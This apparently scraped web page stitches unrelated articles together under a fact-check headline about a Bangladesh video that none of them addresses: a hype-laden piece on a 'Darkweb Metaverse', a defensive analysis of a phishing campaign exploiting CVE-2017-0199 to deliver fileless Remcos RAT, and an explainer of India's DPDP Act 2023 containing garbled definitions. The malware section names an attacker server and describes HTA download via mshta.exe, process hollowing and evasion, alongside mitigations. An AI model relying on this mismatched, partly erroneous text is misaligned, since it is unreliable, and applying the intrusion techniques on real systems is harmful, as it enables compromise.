#FactCheck - "Viral Video Falsely Claimed as Evidence of Attacks in Bangladesh is False & Misleading”

Introduction

Embark on a groundbreaking exploration of the Darkweb Metaverse, a revolutionary fusion of the enigmatic dark web with the immersive realm of the metaverse. Unveiling a decentralised platform championing freedom of speech, the Darkverse promises unparalleled diversity of expression. However, as we delve into this digital frontier, we must tread cautiously, acknowledging the security risks and societal challenges that accompany the metaverse's emergence.

The Dark Metaverse is a unique combination of the mysterious dark web and the immersive digital world known as the metaverse. Imagine a place where users may participate in decentralised social networking, communicate anonymously, and freely express a range of viewpoints. It aims to provide an alternative to traditional online platforms, emphasizing privacy and freedom of speech. Nevertheless, it also brings new kinds of criminality and security issues, so it's important to approach this digital frontier cautiously.

In the vast expanse of the digital cosmos, there exists a realm that remains shrouded in mystery to the casual netizen—the dark web. It is a place where the surface web, the familiar territory of Google searches and social media feeds, constitutes a mere 5 per cent of the information iceberg floating in an ocean of data. Beneath this surface lies the deep web and the dark web, comprising the remaining 95 per cent, a staggering figure that beckons the brave and curious to explore its abysmal depths.

Imagine, a platform that not only ventures into these depths but intertwines them with the emerging concept of the metaverse—a digital realm that defeats the limitations of the physical world. This is the vision of the Darkweb Metaverse, the world’s premier endeavour to harness the enigmatic depths of the dark web and fuse it into the immersive experience of the metaverse.

As per Internet User Statistics 2024, There are over 5.3 billion Internet users in the world, meaning over 65% of the world’s population has access to the Internet. The Internet is used for various services. News, entertainment, and communication to name a few. The citizens of developed countries depend on the World Wide Web for a multitude of daily tasks such as academic research, online shopping, E-banking, accessing news and even ordering food online hence the Internet has become an integral part of our daily lives.

Surface Web

This layer of the internet is used by the general public on a daily basis. The contents of this layer are accessed by standard web browsers namely Google Chrome, and Mozilla Firefox to name a few. The contents of this layer of the internet are indexed by these search engines.

Deep Web

This is the second layer of the internet; its contents are not indexed by search engines. The content that is unavailable on the surface web is considered to be a part of the deep web. The deep web comprises a collection of various types of confidential information. Several Schools, Universities, Institutes, Government Offices and Departments, Multinational Companies (MNCs), and Private Companies store their database information and website-oriented server information such as online profile and accounts usernames or IDs and passwords or log in credentials and companies' premium subscription data and monetary transactional records in the Intra-net which is part of the deep web.

Dark Web

It is the least explored part of the internet which is considered to be a hub of various bizarre activities. The contents of the dark web are not indexed by search engines and specific software is required to access this layer of the internet namely TOR (The Onion Router) browser which cloaks to identify its users making them anonymous. The websites of the dark web are identified from .onion TLD (Top Level Domain). Due to anonymity provided in this layer, various criminal activities take place over there including Drugs trading, Arms trading, and Illegal PayPal account details to websites offering child pornography.

The Darkverse 

The Darkweb Metaverse is not a mere novelty; it is a revolutionary step forward, a decentralised social networking platform that stands in stark contrast to centralised counterparts like YouTube or Twitter. Here, the spectre of censorship is banished, and the freedom of speech reigns supreme. 

The architectonic prowess behind the Darkweb Metaverse is formidable. The development team is a coalition of former infrastructure maestros from Theta Network and virtuosos of metaverse design, bolstered by backend engineers from Gensokishi Metaverse. At the helm is a CEO whose tenure at the apex of large Japanese companies has endowed him with a profound understanding of the landscape, setting a solid foundation for the platform's future triumphs.

Financially, the dark web has been a flourishing underworld, with revenues ranging from $1.5 billion to $3.1 billion between 2020 and 2022. Darkverse, with its emphasis on user-friendliness and safety, is poised to capture a significant portion of this user base. The platform serves as a truly decentralised amalgamation of the Dark Web, Metaverse, and Social Networking Services (SNS), with a mission to provide an unassailable bastion for freedom of speech and expression.

The Darkweb Metaverse is not merely a sanctuary for anonymity and privacy; it is a crucible for the diversity of expression. In a world where centralised platforms can muzzle voices, Darkverse stands as a bulwark against such suppression, fostering a community where a kaleidoscope of opinions and information thrives. The ease of use is unparalleled—a one-time portal that obviates the need for third-party software to access the dark web, protecting users from the myriad risks that typically accompany such ventures.

Moreover, the platform's ability to verify the authenticity of information is a game-changer. In an era laced with misinformation, especially surrounding contentious issues like war, Darkverse offers a sign of truth where the source of information can be scrutinised for its accuracy.

Integrating Technologies 

The metaverse will be an immersive iteration of the internet, decked with interactive features of emerging technologies such as artificial intelligence, virtual and augmented reality, 3D graphics, 5G, holograms, NFTs, blockchain and haptic sensors. Each building block, while innovative, carries its own set of risks—vulnerabilities and design flaws that could pose a serious threat to the integrated meta world.

The dark web's very nature of interaction through avatars makes it a perfect candidate for a metaverse iteration. Here, in this anonymous world, commercial and personal engagements occur without the desire to unveil real identities. The metaverse's DNA is well-suited to the dark web, presenting a formidable security challenge as it is likely to evolve more rapidly than its real-world counterpart.

While Meta (formerly Facebook) is a prominent entity developing the metaverse, other key players include NVIDIA, Epic Games, Microsoft, Apple, Decentraland, Roblox Corporation, Unity Software, Snapchat, and Amazon. These companies are integral to constructing the vast network of real-time 3D virtual worlds where users maintain their identities and payment histories.

Yet, with innovation comes risk. The metaverse will necessitate police stations, not as a dystopian oversight but as a means to address the inherent challenges of a new digital society. In India, for instance, the integration of law enforcement within the metaverse could revolutionize the public's interaction with the police, potentially increasing the reporting of crimes.

The Perils within the Darkverse

The metaverse will also be a fertile ground for crimes of a new dimension—identity theft, digital asset hijacking, and the influence of metaverse interactions on real-world decisions. With a significant portion of social media profiles potentially being fraudulent, the metaverse amplifies these challenges, necessitating robust identity access management.

The integration of NFTs into the metaverse ecosystem is not without its security concerns, as token breaches and hacks remain a persistent threat. The metaverse's parallel economy will test the developers' ability to engender trust, a Herculean task that will challenge the boundaries of national economies.

Moreover, the metaverse will be a crucible for social engineering-based attacks, where the real-time and immersive nature of interactions could make individuals particularly vulnerable to deception and manipulation. The potential for early-stage fraud, such as the hyping and selling of virtual assets at unrealistic prices, is a stark reality.

The metaverse also presents numerous risks, particularly for children and adolescents who may struggle to distinguish  between virtual and real worlds. The implications of such immersive experiences are intense, with the potential to influence behaviour in hazardous ways.

Security risks extend to the technologies supporting the metaverse, such as virtual and augmented reality. The exploitation of biometric data, the bridging of virtual and real worlds, and the tendency for polarisation and societal isolation are all issues requiring immediate attention.

A Way Forward

As we stand on the cusp of this new digital frontier, it is evident that the metaverse, despite its reliance on blockchain, is not immune to the privacy and security breaches that have plagued conventional IT infrastructure. Data security, Identity theft, network security, and ransomware attacks are just a few of the challenges on the way.

In this quest into the unknown, the Darkweb Metaverse radiates with the promise of freedom and the thrill of discovery. Yet, as we navigate these shadowy depths, we must remain vigilant, for the very technologies that empower us also rear the seeds of our grim vulnerabilities. The metaverse is not just a new chapter in the story of the internet—it is a whole narrative, one that we must write with caution and care.

References 

• https://spores.medium.com/the-worlds-first-platform-to-deploy-the-dark-web-in-the-metaverse-releap-ido-on-spores-launchpad-a36387b184de 
• https://www.makeuseof.com/how-hackers-sell-trade-data-in-metaverse/
• https://www.demandsage.com/internet-user-statistics/#:~:text=There%20are%20over%205.3%20billion,has%20access%20to%20the%20Internet.

‍

Introduction

Recently the attackers employed the CVE-2017-0199 vulnerability in Microsoft Office to deliver a fileless form of the Remcos RAT. The Remcos RAT makes the attacker have full control of the systems that have been infected by this malware. This research will give a detailed technical description of the identified vulnerability, attack vector, and tactics together with the practical steps to counter the identified risks.

The Targeted Malware: Remcos RAT

Remcos RAT (Remote Control & Surveillance) is a commercially available remote access tool designed for legitimate administrative use. However, it has been widely adopted by cybercriminals for its stealth and extensive control capabilities, enabling:

• System control and monitoring
• Keylogging
• Data exfiltration
• Execution of arbitrary commands

The fileless variant utilised in this campaign makes detection even more challenging by running entirely in system memory, leaving minimal forensic traces.

Attack Vector: Phishing with Malicious Excel Attachments

The phishing email will be sent which appears as legitimate business communication, such as a purchase order or invoice. This email contains an Excel attachment that is weaponized to exploit the CVE-2017-0199 vulnerability.

Technical Analysis: CVE-2017-0199 Exploitation

Vulnerability Assessment

• CVE-2017-0199 is a Remote Code Execution (RCE) vulnerability in Microsoft Office which uses Object Linking and Embedding (OLE) objects.
• Affected Components:some text
  • Microsoft Word
  • Microsoft Excel
  • WordPad
• CVSS Score: 7.8 (High Severity)

Mechanism of Exploitation

The vulnerability enables attackers to craft a malicious document when opened, it fetches and executes an external payload via an HTML Application (HTA) file. The execution process occurs without requiring user interaction beyond opening the document.

Detailed Exploitation Steps

1. Phishing Email and Malicious Document some text
   • The email contains an Excel file designed to make use of CVE-2017-0199.
   • When the email gets opened, the document automatically connects to a remote server (e.g., 192.3.220[.]22) to download an HTA file (cookienetbookinetcache.hta).
2. Execution via mshta.exe some text
   • The downloaded HTA file is executed using mshta.exe, a legitimate Windows process for running HTML Applications.
   • This execution is seamless and does not prompt the user, making the attack stealthy.
3. Multi-Layer Obfuscation some text
   • The HTA file is wrapped in several layers of scripting, including: some text
     • JavaScript
     • VBScript
     • PowerShell
   • This obfuscation helps evade static analysis by traditional antivirus solutions.
4. Fileless Payload Deployment some text
   • The downloaded executable leverages process hollowing to inject malicious code into legitimate system processes.
   • The Remcos RAT payload is loaded directly into memory, avoiding the creation of files on disk.

Fileless Malware Techniques

1. Process Hollowing
The attack replaces the memory of a legitimate process (e.g., explorer.exe) with the malicious Remcos RAT payload. This allows the malware to:

• Evade detection by blending into normal system activity.
• Run with the privileges of the hijacked process.

2. Anti-Analysis Techniques

• Anti-Debugging: Detects the presence of debugging tools and terminates malicious processes if found.
• Anti-VM and Sandbox Evasion: Ensures execution only on real systems to avoid detection during security analysis.

3. In-Memory Execution

• By running entirely in system memory, the malware avoids leaving artifacts on the disk, making forensic analysis and detection more challenging.

Capabilities of Remcos RAT

Once deployed, Remcos RAT provides attackers with a comprehensive suite of functionalities, including:

• Data Exfiltration: some text
  • Stealing system information, files, and credentials.
• Remote Execution: some text
  • Running arbitrary commands, scripts, and additional payloads.
• Surveillance: some text
  • Enabling the camera and microphone.
  • Capturing screen activity and clipboard contents.
• System Manipulation: some text
  • Modifying Windows Registry entries.
  • Controlling system services and processes.
  • Disabling user input devices (keyboard and mouse).

Advanced Phishing Techniques in Parallel Campaigns

1. DocuSign Abuse
Attackers exploit legitimate DocuSign APIs to create authentic-looking phishing invoices. These invoices can trick users into authorising payments or signing malicious documents, bypassing traditional email security systems.

2. ZIP File Concatenation
By appending multiple ZIP archives into a single file, attackers exploit inconsistencies in how different tools handle these files. This allows them to embed malware that evades detection by certain archive managers.

Broader Implications of Fileless Malware

Fileless malware like Remcos RAT poses significant challenges:

• Detection Difficulties: Traditional signature-based antivirus systems struggle to detect fileless malware, as there are no static files to scan.
• Forensic Limitations: The lack of disk artifacts complicates post-incident analysis, making it harder to trace the attack's origin and scope.
• Increased Sophistication: These campaigns demonstrate the growing technical prowess of cybercriminals, leveraging legitimate tools and services for malicious purposes.

Mitigation Strategies

1. Patch Management some text
   • It is important to regularly update software to address known vulnerabilities like CVE-2017-0199. Microsoft released a patch for this vulnerability in April 2017.
2. Advanced Email Security some text
   • It is important to implement email filtering solutions that can detect phishing attempts, even those using legitimate services like DocuSign.
3. Endpoint Detection and Response (EDR)some text
   • Always use EDR solutions to monitor for suspicious behavior, such as unauthorized use of mshta.exe or process hollowing.
4. User Awareness and Training some text
   • Educate users about phishing techniques and the risks of opening unexpected attachments.
5. Behavioral Analysis some text
   • Deploy security solutions capable of detecting anomalous activity, even if no malicious files are present.

Conclusion

The attack via CVE-2017-0199 further led to the injection of a new fileless variant of Remcos RAT, proving how threats are getting more and more sophisticated. Thanks to the improved obfuscation and the lack of files, the attackers eliminate all traditional antiviral protection and gain full control over the infected computers. It is real and organisations have to make sure that they apply patches on time, that they build better technologies for detection and that the users themselves are more wary of the threats.

References

• Fortinet FortiGuard Labs: Analysis by Xiaopeng Zhang
• Perception Point: Research on ZIP File Concatenation
• Wallarm: DocuSign Phishing Analysis
• Microsoft Security Advisory: CVE-2017-0199

‍

Introduction

The nation got its first consolidated data protection regulation in the form of the Digital Personal Data Protection Act, 2023, in the month of August, and the Indian netizens got their independence in terms of data protection and privacy. The act lays heavy penalties for non-compliance with the provisions, and the same is under the jurisdiction of a Data Protection Board set up by the Central Government, which enjoys powers equivalent to a civil court. The act upholds the right to data privacy as the fundamental right under Article 19 (1)(A) and 21 of the Constitution of India. The same has been judicially supported in the form of the landmark judgement,  Jus. K.S Puttawamy vs. Union of India of 2018. Let us take a look at the impact the act will make on the Indian netizens. 

‍

What is Personal Data? 

Personal Data refers to any form of digitised data which can be directly replicated by any person. This includes email IDs, mobile numbers, health data, banking data, photos, etc. A person to whom the personal data belongs is called the Data Principle. A Data principle is anyone who is above the age of 18 years and consents to the data of children/minors. In the case of children/minors, it is mandatory for the parents or guardians to provide their express consent for the processing of personal data for all or any purposes. Any individual who is processing personal data is known as the Data Fiduciry, and individuals registered under the act may act as consent managers to make the consent transparent.  When it comes to the rights of the netizens, it is seen that the act is created with an aspect of  “Safety by Design” to secure the rights and responsibilities of the netizens. 

‍

Rights secured under the DPDP Act 2023

• Right to Grievance Redressal: The Data fiduciary and the consent manager are required to respond to the grievances of the Data Principal within a time period, which is soon to be prescribed, thus creating a blanket of responsibility for the data fiduciary and consent manager. 
• Right to Nominate: Data Principals have the right to nominate any other individual who shall, in the event of death or incapacity of the data principal, exercise his/her rights.  
• Right to access to information: The Data principal has the right to seek confirmation from Data fiduciaries regarding the processing of their personal data and the summary of the processed data as well. 
• Right to Erasure and Correction: Data principals can reach out to the data fiduciaries in order to exercise their right to correct, complete, update and erasure of their personal data.  
• Territorial Rights: The data is to be processed within India, and processing outside India should be in regard to the services provided in India. 
• Material Rights: The rights are applicable to any personal data collected in digitised form and also for the data collected in a non-digital form but subsequently digitised. 

Obligations for Data Fiduciaries 

The data fiduciaries are mandated to oblige with the following provisions in order to maintain compliance with the laws of the land and by securing the Digital rights of the netizens. 

These are the obligations of the data fiduciaries: 

• Implement technical and organisational measures to safeguard Personal Data. 
• Determine the legal grounds for processing and obtaining consent from Data principals where required. 
• Provide a privacy notice while obtaining consent from Data principals. 
• Implement a mechanism for data principals to exercise their rights.
• Implement a grievance redressal mechanism for handling the queries from Data principals. 
• Irrecoverably delete personal data after the purpose for which it was collected has expired or when the consent has been withdrawn. 
• Have a breach management policy to notify the data protection board and the data principals in accordance with prescribed timelines. 
• Sign a valid contract with Data processors to ensure key obligations are abided by them, including timely deletion of data. 

Conclusion 

As the world steps into the digital age, it is pertinent for the governments of the world to come up with efficient and effective legislation to protect cyber rights and responsibilities, but as cyberspace has no boundaries, nations need to work in synergy to protect their cyber interests and netizens. This can only begin once all nations have indigenous Cyber laws and rights to protect netizens, and the same has been addressed by the Indian Government in the form of the Digital Perosnl Data Protection Act, 2023. The future is full of emerging technologies and the evolution of cyber laws; hence, consolidating a basic legal structure now is of utmost importance and the same is expected to be strengthened in India by the soon-to-be-released Draft Digital India Bill.  

‍